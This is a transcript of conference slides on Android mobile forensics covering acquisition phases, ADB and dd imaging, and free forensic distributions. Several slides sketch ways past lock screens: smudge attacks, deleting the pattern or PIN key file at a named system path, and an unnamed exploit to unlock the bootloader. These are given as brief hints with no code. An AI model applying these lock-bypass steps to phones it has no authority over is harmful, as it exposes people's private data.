Android Forensics with Free/Open Source Tools - DroidconIT_2016
-
Upload
alessandro-di-carlo -
Category
Technology
-
view
724 -
download
6
Transcript of Android Forensics with Free/Open Source Tools - DroidconIT_2016
Android Forensics with Free/Open
Source ToolsTurin 7-8 April
Alessandro Di Carlo
• Graduated at University of Camerino• Reviewer and writer of articles for Hakin9,eForensics
Magazine and PenTest Magazine• Writer of articles for Hacker Journal• eCPPT certified – Professional Penetration Tester• Member of IISFA (International Information Systems Forensics
Association)• Member of ONIF (Osservatorio Nazionale Informatica Forense)• Security Expert , System Analyst and Trainer for Tiger Security
Srl
$WHOAMI
• “Digital forensics is a branch of forensics science encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime”• Mobile device forensics is a branch of digital forensics which
deals with extracting, recovering and analyzing digital evidence or data from a mobile device under forensically sound conditions.
What is Digital Forensics?
Investigation
Seizure and
Isolation
Acquisition
Examination and
Analysis
Reporting
Phases in Mobile Forensics
Very important questions• Is Device Turn on?• Is Device Turn off?• If is Turn on, is it protect with passcode?• If is Turn on, is it unlocked?• …
Prevent alteration of data
Flight Mode
Faraday Bad
Eject Sim Card
• You can do shutdown though smartphone is locked!• Is there a PIN after reboot?• Total loss of data loaded into RAM!!
Pay attention at shutdown!!
• Mainly we have two type of acquisition
Acquisition
Logical Acquisition Physical Acquisition
• Logical extraction is analogous to copying and pasting a folder in order to extract data from a system• If any hidden or deleted files are present in the folder beind
copied, they will not be in the pasted version of the folder
Logical Acquisition
• Deleted data can be recovered from logical extraction only if they are stored in a SQLite database• The data can be recovered is :
1. Contact2. Call logs3. Sms/mms4. Application data5. System logs and information
Logical Acquisition
Logical Acquisition – File System directory
Logical Acquisition – File System directory
Hey man, I have lock screen!• Hey bro…what kind of lock screen have you?!?
Hey man, I have lock screen!• Break the Passcode!! 😎
Smudge Attack!
Hey man, I have lock screen!• Break the Passcode!! 😎
Pattern Lock attack
We can delete this file!!
Hey man, I have lock screen!• Break the Passcode!! 😎
Cracking PIN• The PIN key is located in
/data/system/password.key
• Not easy to decrypt, it depends on the strength of the password !!
We can delete this file!!
Logical Acquisition with ADB
• This tool is awesome in a lot of case• For example, in a small investigation, with the simple command
pull we can , obviously , pull single file or entire directories directly from the device to examiner computer
Logical Acquisition with ADB
Logical Acquisition with ADB
Logical Acquisition with ADB• Use ADB is possible when we have USB Debug active• If we haven’t it, WTF doing?!?!?
Logical Acquisition with ADB
Logical Acquisition with ADB• When device is in bootloader mode, the fastboot protocol
could be used!• Is bootloader protected?• YES = S-ON ; active protection, inhibited protocol• NO = S-OFF ; inhibited protection , active protocol
• Exploit to get S-OFF
Physical Extraction
• Physical extraction is an exact bit-for-bit image of electronic media• Whit this extraction we can extract everything! • We could perform a physical extraction simply with dd linux
command
Physical Extraction
Free/Open tools
Free/Open tools
http://www.caine-live.net
http://www.deftlinux.net/it/
Free/Open tools
Demo!
Contact me@samaritan_o
https://www.facebook.com/dikkemberg
https://it.linkedin.com/in/alessandrodicarlo92
https://keybase.io/samaritan
[email protected]@tigersecurity.pro
www.alessandrodicarlo.com(Under Manteinance Online on the 11-04-2016)
Thanks you!